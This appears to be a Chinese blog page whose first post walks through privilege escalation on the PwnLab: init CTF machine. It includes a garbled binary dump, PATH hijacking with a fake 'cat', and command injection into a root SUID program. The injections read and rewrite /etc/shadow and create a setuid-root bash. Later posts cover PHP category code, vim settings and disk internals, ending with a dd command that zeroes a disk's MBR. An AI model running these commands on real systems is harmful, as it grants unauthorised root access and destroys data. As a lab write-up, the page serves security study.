-rwsr-sr-x 1 mike mike 5148 Mar 17  2016 msgmike
-rw-r--r-- 1 kane kane  675 Mar 17  2016 .profile

粗略分析msgmike

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
ELF`4l4(44444@@@@@ $LLL锟斤拷HHHDDP锟絫dXXX,,Q锟絫d/lib/ld-linux.so.2GNU GNU锟斤拷锟�3锟終锟絫g没锟斤拷}雸砮  锟終锟斤拷,E #3鈻�
T4DHLPTS锟斤拷锟斤拷锟絎锟斤拷锟斤拷锟斤拷锟斤拷t锟�*锟絒锟斤拷5<锟�%@锟�%Dh锟斤拷锟斤拷锟斤拷%H锟斤拷锟斤拷锟斤拷%Lh锟斤拷锟斤拷锟斤拷%Ph鈻掞拷锟斤拷锟斤拷锟�%Th 锟斤拷锟斤拷锟�1锟絕锟斤拷锟斤拷锟絇TRh h锟絈Vh[锟斤拷锟斤拷锟斤拷f锟絝锟絝锟絝锟絝锟絝锟絝锟斤拷$锟絝锟絝锟絝锟絝锟絝锟絝锟斤拷c-`锟斤拷v鈻掞拷锟斤拷tU锟斤拷锟斤拷h`锟叫冿拷锟斤拷脨锟絫&锟絗-`锟斤拷锟斤拷锟斤拷锟斤拷锟絫锟斤拷tU锟斤拷锟斤拷Ph`锟揭冿拷锟斤拷脥t&锟斤拷'锟�=`uU锟斤拷锟斤拷|锟斤拷锟斤拷`锟斤拷锟絝锟斤拷H锟斤拷锟絬霌峷锟斤拷锟絫锟経锟斤拷锟斤拷P锟揭冿拷锟斤拷u锟斤拷锟斤拷L$锟斤拷锟斤拷q锟経锟斤拷Q锟斤拷锟絟锟絟锟斤拷锟斤拷锟斤拷锟斤拷锟絟锟絟锟斤拷锟斤拷锟斤拷锟斤拷锟斤拷
                                                                                    h@锟絤锟斤拷锟斤拷锟斤拷M锟缴峚锟斤拷f锟経W1锟絍S锟斤拷锟斤拷锟斤拷锟絵锟斤拷锟絣$0锟斤拷
锟斤拷锟斤拷锟斤拷锟斤拷锟斤拷锟斤拷锟斤拷锟絊锟斤拷c锟斤拷锟斤拷锟�                                                                                                    锟斤拷锟斤拷锟斤拷锟斤拷锟斤拷锟�)锟斤拷锟斤拷锟絫'锟斤拷锟紻$8锟�,$锟紻锟紻$4锟紻$锟斤拷锟斤拷锟斤拷锟�9锟絬邇锟絒^_]锟斤拷
                        锟絒锟絚at /home/mike/msg.txt(锟斤拷锟斤拷D锟斤拷锟絟X锟斤拷锟斤拷锟斤拷锟斤拷锟絲R|
                                                                        \锟斤拷锟紽
                                                                             J
                                                                              tx?鈻�;*2$"(@锟斤拷锟斤拷SD
                                                                                               GuCu|@
                                                                                                     A锟紺
                                                                                                        8l锟斤拷锟斤拷a锟紸
                                                                                                                 锟紺锟紸锟絅0HA锟紸锟�
                                                                                                                             AA锟斤拷锟斤拷锟斤拷0锟�
$@鈻扗锟斤拷锟給锟斤拷锟�                                                                                                                           
^
 8(锟斤拷锟給锟斤拷锟斤拷o锟斤拷锟給zL&6FVGCC: (Debian 4.9.2-10) 4.9.2GCC: (Debian 4.8.4-1) 4.8.4.symtab.strtab.shstrtab.interp.note.ABI-tag.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.jcr.dynamic.got.got.plt.data.bss.comment4Hh锟斤拷z锟斤拷    锟斤拷
 
锟�
$8X锟紷DHL48X鈻抈鈻掞拷锟�
(< P`鈻抃 v锟絏鈻掞拷锟� 锟絓鈻掞拷<锟斤拷锟斤拷a 锟�
        crtstuff.c__JCR_LIST__deregister_tm_clonesregister_tm_clones__do_global_dtors_auxcompleted.6279__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entrymsgmike.c__FRAME_END____JCR_END____init_array_end_DYNAMIC__init_array_start_GLOBAL_OFFSET_TABLE___libc_csu_fini_ITM_deregisterTMCloneTable__x86.get_pc_thunk.bxdata_start_edata_fini__data_startsystem@@GLIBC_2.0__gmon_start____dso_handle_IO_stdin_usedsetreuid@@GLIBC_2.0__libc_start_main@@GLIBC_2.0__libc_csu_init_end_start_fp_hw__bss_startmainsetregid@@GLIBC_2.0_Jv_RegisterClasses__TMC_END___ITM_registerTMCloneTable_init4#HH 1hh$D锟斤拷锟給锟斤拷 N
               锟斤拷pV^^锟斤拷锟給zzk锟斤拷锟給锟斤拷 z    锟斤拷      B锟斤拷(
                                                   锟�#锟絗锟絗`锟斤拷$$锟�88锟絏X,锟斤拷锟斤拷锟紷@锟紻D锟紿H锟絃L锟�44锟�88 锟絏``锟�0`9锟絇- 锟�
                                                                                                         |
有一句cat /home/mike/msg.txt 应该就是其所封装的命令

属主是mike

在history中有这么一句

1
export PATH=./:$PATH
那么,我们也构造一句
1
export PATH=/home/kane:$PATH

1
2
3
kane@pwnlab:~$ echo $PATH
echo $PATH
/home/kane:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

查看PATH中第一个目录的权限

1
2
3
kane@pwnlab:/usr/local$ ls -lad bin
ls -lad bin
drwxrwsr-x 2 root staff 4096 Mar 17  2016 bin

修改当前目录下的cat文件

1
kane@pwnlab:~$ echo "/bin/bash;ls " > cat
再次运行./msgmike

1
2
3
kane@pwnlab:~$ ./msgmike
./msgmike
mike@pwnlab:~$

现在是属主为root用户的suid文件,和上述套路一致

1
2
3
4
5
6
7
8
9
10
mike@pwnlab:/home/mike$ ls -la
ls -la
total 28
drwxr-x--- 2 mike mike 4096 Mar 17  2016 .
drwxr-xr-x 6 root root 4096 Mar 17  2016 ..
-rw-r--r-- 1 mike mike  220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 mike mike 3515 Mar 17  2016 .bashrc
-rwsr-sr-x 1 root root 5364 Mar 17  2016 msg2root
-rw-r--r-- 1 mike mike  675 Mar 17  2016 .profile

执行一遍

1
2
3
4
5
mike@pwnlab:/home/mike$ ./msg2root
./msg2root                                                                                                                                                                                                
Message for root: flag{T5566Y}                                                                                                                                                                            
flag{T5566Y}                                                                                                                                                                                              
flag{T5566Y}

复制到tmp目录下,蚁剑查看内容

猜测代码为

1
/bin/echo %s >> /root/messages.txt

猜测源代码为

1
2
3
4
5
6
7
8
9
10
11
12
13
#include <stdio.h>
void main(){
	// printf("helloworld\n");
	char a[];
	scanf("%c",&a);
	// printf(a);
	char s[500];
	sprintf(s,"/bin/echo %s >> /root/messages.txt",a);
	// system("/bin/echo %s >> /root/messages.txt",a);
	printf("%s\n",s);
	system(s);
	// printf("%s\n",a );
}

1
2
3
4
a;sed -i 's@^root.*@root:$6$k/mtF8Ic$.whWyn0EQI4q3rucHh3iYK.E6gTmbG3l1KoaQpnFrvs.bD2gw.JCvip1Jt4As5Vz7XKvgWAOz0L/iwaM2aDwp/:18042:0:99999:7:::@g$' /etc/shadow;echo 0

/bin/echo "";sed "s@^root.*@root:$6$k/mtF8Ic$.whWyn0EQI4q3rucHh3iYK.E6gTmbG3l1KoaQpnFrvs.bD2gw.JCvip1Jt4As5Vz7XKvgWAOz0L/iwaM2aDwp/:18042:0:99999:7:::@g" /etc/shadow;echo "hello" >> /root/messages.txt
a;a=\";echo $a;echo a

sed 可以看出来是直接返回我输入的内容 但是如果我输入的是带反引号的语句呢?

1
`/bin/bash`

上面的实践无效

不行,深夜,我想到还是用普通的语句的老老实实的换吧

1
2
3
4
5
6
7
8
9
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: "";grep "root" /etc/shadow;echo ""
"";grep "root" /etc/shadow;echo ""

root:$6$aYZMZ3V0$qAYwiR7aanVmKSWyV5IbRffspdjFx4xhLrm8kbHhh1DG16Bdb0/ptImcDK2uT.6xc/FZotacYr0X4dB0SurjD/:16877:0:99999:7:::

# root:$6$k/mtF8Ic$.whWyn0EQI4q3rucHh3iYK.E6gTmbG3l1KoaQpnFrvs.bD2gw.JCvip1Jt4As5Vz7XKvgWAOz0L/iwaM2aDwp/:16877:0:99999:7:::

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: "";cp /bin/bash /home/kane/sh;chmod +s /home/kane/sh;echo ""
"";cp /bin/bash /home/kane/sh;chmod +s /home/kane/sh;echo ""


mike@pwnlab:/home/mike$ cd 
cd 
mike@pwnlab:~$ ls
ls
cat  flag_wrong.txt  msgmike  sh  tq
mike@pwnlab:~$ ls -la
ls -la
total 1160
drwxr-x--- 2 kane kane    4096 May 26 17:47 .
drwxr-xr-x 6 root root    4096 Mar 17  2016 ..
-rw------- 1 kane kane    1245 May 26 10:36 .bash_history
-rw-r--r-- 1 kane kane     220 Mar 17  2016 .bash_logout
-rw-r--r-- 1 kane kane    3515 Mar 17  2016 .bashrc
-rwxrwxrwx 1 kane kane      14 May 26 17:01 cat
-rw-r--r-- 1 root root      13 Apr 25 10:32 flag_wrong.txt
-rwsr-sr-x 1 mike mike    5148 Mar 17  2016 msgmike
-rw-r--r-- 1 kane kane     675 Mar 17  2016 .profile
-rwsr-sr-x 1 root root 1105840 May 26 17:47 sh
-rwsr-sr-x 1 root root   38868 May 26 17:42 tq
mike@pwnlab:~$ sh
sh
sh-4.3# whoami
whoami
root
sh-4.3#

引用一下几个文件/etc/bash.bashrc /etc/profile /root/.profile /root/.bashrc 然后用vi强行修改/etc/shadow文件,登陆成功

1
2
3
root@pwnlab:/home/kane# id
id
uid=0(root) gid=0(root) groups=0(root)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@pwnlab:~# cat flag.txt
cat flag.txt
.-=~=-.                                                                 .-=~=-.
(__  _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__  _)
(_ ___)  _____                             _                            (_ ___)
(__  _) /  __ \                           | |                           (__  _)
( _ __) | /  \/ ___  _ __   __ _ _ __ __ _| |_ ___                      ( _ __)
(__  _) | |    / _ \| '_ \ / _` | '__/ _` | __/ __|                     (__  _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \                     (_ ___)
(__  _)  \____/\___/|_| |_|\__, |_|  \__,_|\__|___/                     (__  _)
( _ __)                     __/ |                                       ( _ __)
(__  _)                    |___/                                        (__  _)
(__  _)                                                                 (__  _)
(_ ___) If  you are  reading this,  means  that you have  break 'init'  (_ ___)
( _ __) Pwnlab.  I hope  you enjoyed  and thanks  for  your time doing  ( _ __)
(__  _) this challenge.                                                 (__  _)
(_ ___)                                                                 (_ ___)
( _ __) Please send me  your  feedback or your  writeup,  I will  love  ( _ __)
(__  _) reading it                                                      (__  _)
(__  _)                                                                 (__  _)
(__  _)                                             For sniferl4bs.com  (__  _)
( _ __)                                claor@PwnLab.net - @Chronicoder  ( _ __)
(__  _)                                                                 (__  _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-'                                                                 `-._.-'
root@pwnlab:~# 
1
2
3
4
5
6
python -c "import pty;pty.spawn('/bin/rbash')"
su kane -c "iSv5Ym2GRo"
cd /home/kane
export PATH=/home/kane:$PATH
echo "/bin/bash;ls " > cat
./msgmike

发表于 更新于 分类于

无限分类

无限分类类似于磁盘中linux的文件查找机制 表的设计可以简化为 id->就是id啊 pid->父级id

高级一点,也方便查找的数据表结构可以新增一个字段 path->递归记录父类id,包括祖id

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
public function add(){  //这是一个控制器,用来接收post参数
	$name=trim($_POST['name']);
	$pid=trim($_POST['pid']);
	
	if(isset($pid)){
		do{
			$pid=db(goods)->limit(['pid'=>$pid])->select();
			$path=$pid.$path;
		}while($pid!=0);
		$id=db(goods)->save(['name'=>$name,'pid'=>$pid,'path'=>$path]); 
	}else{
		$id=db(goods)->save(['name'=>$name,'pid'=>0]);//需要设定$path默认为零,也就是说,如果没有传入path,他就是一个根分类
	}
	return($id);	
}

发表于 更新于 分类于

.vimrc

1
2
3
4
5
syntax enable
set t_Co=256
set background=dark
let g:solarized_termtrans = 1   #这一条存在的原因是,xwindows情境下,由于透明度等因素,会使vim页面变得灰白,加上这一条命令即可
colorscheme solarized

发表于 更新于 分类于

硬盘

机械式硬盘

由磁片,磁头构成,磁盘按扇区划分 机械式磁盘可以由多个磁盘片构成 每个磁盘片相同位置的扇区,每个大小512Byte构成的一个空心圆柱叫做柱面 为了实现快速数据读写,硬盘往往会多个磁头向多个磁盘片同时写入数据 同一个文件,会被写到多个磁盘片内

低级格式化

划分磁道,扇区

磁道

磁头在磁盘掠过的每个圆环叫一个磁道,每个磁道可以分成若干个扇区.

扇区

扇区,每个大小为512Byte,历史中的每个扇区的大小为512Byte,但是随着技术发展,大家约定俗成的扇区大小变成了4096Byte,但是为了兼容以前的操作系统,磁盘允许每个4096Byte扇区虚拟为八个512Byte,如果所有数据都是从4096Byte扇区的头512Byte开始写入,而不是从后3584Byte中开始写入,这叫做4K对齐 如果从后7个虚拟扇区开始写入,就叫做4K不对齐 4K对齐的好处很多,比如数据写入速度变快,因为扇区的大小越大,所形成的扇区数就明显变少,超过扇区大小的数据存储在多个块中时,所需要操作系统寻找的扇区变少,数据能更快的存储 如果仍然使用512为一块/簇,会造成写入速度极慢

柱面

每个硬盘都会有许多块磁片,可以同时写入,加快写入效率,缺点就是,一但有一片瓷片损坏,整个硬盘数据都会发生损坏,整个柱面都是不可用的

块/block

windows中,存储数据以簇为单位,linux中,以块为单位(只是叫法不同,但是实际含义都是一个意思),系统中常常规定多少个扇区为一个簇(块),因为一个扇区的大小为512b,所以簇(块)必须为扇区的整数倍,常见的簇(块)大小为1024b,2048b,4096b(4k最常用) 每个块/簇由2^n倍的扇区构成

主引导记录mbr

零磁道,零扇区 512Byte,叫做主引导记录 这个存储空间被划分为三个片段 446Byte:bootloader 启动器,一段代码程序,用于从分区中加载内核(kernel) 64Byte: 16Byte: 用于标识一个分区 最高四个分区,16Byte*4 2Byte: 魔数 标记mbr是否有效

电脑的启动过程

主板加电,bios程序读入内存,cpu执行bios程序,bios自检程序完成后,加载用户定义的启动顺序 开始寻找磁盘上的mbr,当找到有效的mbr后,bios把mbr存储的bootloader加载入内存,bios程序退出,bootloader开始执行 找到预定的特定分区,寻找操作系统的内核,加载入内存,完成内核的解压缩,运行在内存上,bootloader退出,内核开始工作 内核被加载入特权级0的区域

深入理解Linux启动过程 Linux内核的加载过程 initrd 和 initramfs

扩展分区

存储于硬盘mbr,存储一个指针指向另一个地址,用于绑定扩展分区

分区

一个硬盘被分成若干个逻辑块,用标号进行标识分区,例如sdX

高级格式化

用于创建文件系统,mk2fs

文件系统

也是程序的一种,他负责文件的增删改查 文件系统分为几个部分,磁盘引导,超级块,inode池,数据存储区

inode

inode用于记录文件的一些属性,包括修改时间,创建时间,文件数据块的位置,硬链接数,权限,UID,GID等,但不记录文件名,文件名由文件夹记录 详细请下载linuxkernel 在include/linux struct inode结构体中有详细声明

inode table

文件系统中专门分出用于存储inode文件的地方,inode文件每个大小一般为128Byte或256Byte,inode数量在创建文件系统时给出,按照一定比例生成inode,比如两个块一个inode

位图/Bitmap

使用1/0来记录块是否被使用,使用inode的原因是,便于操作系统识别未使用过的系统资源,方便检索 block bitmap:记录块的使用情况 inode bitmap:记录inode的使用情况

超级块/Super Block

开头的第一个byte是byte 0,从 byte 1024开始往后的一部分数据。超级块中的数据其实就是文件卷的控制信息部分,也可以说它是卷资源表,有关文件卷的大部分信息都保存在这里。例如:硬盘分区中每个block的大小、硬盘分区上一共有多少个block group、以及每个block group中有多少个inode.超级块存在备份,创建文件系统的时候被随机备份于若干块中,若分区superblock被破坏,可以使用备份块恢复

vfs

不同文件系统的协调器,给出了一个统一接口

分区命令

fdisk 指定硬盘 m为操作方法

安全卸载硬盘

要先杀死所有在分区上运行着的程序

1
fuser -mk 挂载点

重新分区

需要先把硬盘第一个分区(MBR)的所有信息清除

1
dd -if /dev/zero -of 硬盘设备文件 bs=512 count=1